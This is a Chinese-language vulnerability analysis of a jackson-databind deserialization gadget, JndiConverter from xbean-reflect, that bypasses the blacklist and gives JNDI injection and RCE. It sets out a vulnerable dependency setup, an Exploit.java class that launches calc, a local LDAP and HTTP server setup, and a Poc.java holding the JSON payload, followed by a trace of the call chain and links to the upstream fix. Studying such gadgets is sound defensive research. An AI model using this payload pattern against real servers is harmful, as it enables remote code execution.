赞
踩
JDNI注入导致RCE
2020年2月,jackson-databind在github上更新了一个新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
环境搭建
pom.xml如下:
- <dependencies>
- <dependency>
- <groupId>com.fasterxml.jackson.core</groupId>
- <artifactId>jackson-databind</artifactId>
- <version>2.9.9.1</version>
- </dependency>
-
- <!-- https://mvnrepository.com/artifact/org.apache.xbean/xbean-reflect -->
- <dependency>
- <groupId>org.apache.xbean</groupId>
- <artifactId>xbean-reflect</artifactId>
- <version>4.17</version>
- </dependency>
-
- <dependency>
- <groupId>org.slf4j</groupId>
- <artifactId>slf4j-nop</artifactId>
- <version>1.7.2</version>
- </dependency>
- <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
- <dependency>
- <groupId>javax.transaction</groupId>
- <artifactId>jta</artifactId>
- <version>1.1</version>
- </dependency>
- </dependencies>
漏洞利用
这里使用LDAP的利用方式进行漏洞的利用演示,RMI的方式也是类似的,且RMI比LDAP要对JDK版本有很大的局限性~
LDAP利用方式:jdk版本:JDK 11.0.1、8u191、7u201、6u211之前,笔者这里采用JDK 1.8.0_181
编译Exploit.java
Exploit.java代码如下:
- import java.lang.Runtime;
-
- public class Exploit {
- static {
- try {
- Runtime.getRuntime().exec("calc");
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- }
编译Exploit.java文件:
搭建HTTP服务
使用Python搭建简易SimpleHTTPServer服务:
python -m SimpleHTTPServer 4444
搭建LDAP服务
使用marshalsec来启动一个LDAP服务:
执行漏洞POC1
Poc.java代码如下所示:
- package com.jacksonTest;
-
- import com.fasterxml.jackson.databind.ObjectMapper;
- import java.io.IOException;
-
- public class Poc {
- public static void main(String[] args) throws Exception {
- ObjectMapper mapper = new ObjectMapper();
- mapper.enableDefaultTyping();
- String payload = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://127.0.0.1:1099/Exploit\"}]";
- try {
- Object obj = mapper.readValue(payload, Object.class);
- } catch (IOException e) {
- e.printStackTrace();
- }
- }
- }
之后运行该程序,成功执行命令,弹出计算器:
首先定位到org.apache.xbean.propertyeditor.JndiConverter类,发现在该类较为简单,且构造函数直接调用父类的构造方法,不过在该类中却调用了lookup对text进行查询,这一点需要留意,看后续是否有与toObjectImpl函数的相关调用点,之后跟进父类AbstractConvert:
在父类中搜索toObjectImpl发现在toObject中有调用,且参数为当前类的text:
之后继续查看toObject的调用,发现在setAsText处调用,且传递的参数为text可控:
综上所述,我们可以指定反序列化类为org.apache.xbean.propertyeditor.JndiConverter,之后指定set方法为asText,之后传递参数为ldap服务地址,之后在setAsText中调用toObject函数,之后在toObject中调用toObjectImp,之后在toObjectImp中执行lookup,从而导致JNDI,最终RCE~
整个利用链如下所示:
- mapper.readValue
- ->AbstractConverter.setAsText
- ->AbstractConverter.toObject
- ->JndiConverter.toObjectImpl
- ->lookup
官方在github的更新方式依旧是添加相关类到黑名单,但这种方式治标不治本,后续可能出现其他绕过黑名单的gdaget:
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
https://github.com/FasterXML/jackson-databind/issues/2620
https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。